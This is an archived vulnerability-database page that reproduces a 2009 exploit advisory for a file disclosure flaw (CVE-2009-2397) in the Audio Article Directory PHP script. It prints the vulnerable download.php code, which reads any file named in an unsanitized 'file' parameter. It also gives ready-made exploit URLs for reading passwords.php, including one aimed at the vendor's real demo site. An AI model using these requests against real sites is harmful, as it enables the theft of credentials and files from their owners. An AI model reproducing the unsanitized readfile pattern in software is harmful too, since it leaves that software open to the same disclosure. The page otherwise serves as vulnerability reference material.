Lucene search
+L

Audio Article Directory - 'file' Remote File Disclosure

🗓️ 29 Jun 2009 00:00:00Reported by ThE g0bL!NType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Audio Article Directory - 'file' Remote File Disclosure Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-2397
29 Jun 200900:00
circl
CVE
CVE-2009-2397
9 Jul 200916:00
cve
Cvelist
CVE-2009-2397
9 Jul 200916:00
cvelist
EUVD
EUVD-2009-2393
7 Oct 202500:30
euvd
NVD
CVE-2009-2397
9 Jul 200916:30
nvd
Prion
Directory traversal
9 Jul 200916:30
prion
#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
 header('Content-Description: File Transfer');
           header('Content-Type: application/force-download');
           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
           header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################

# milw0rm.com [2009-06-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02922
40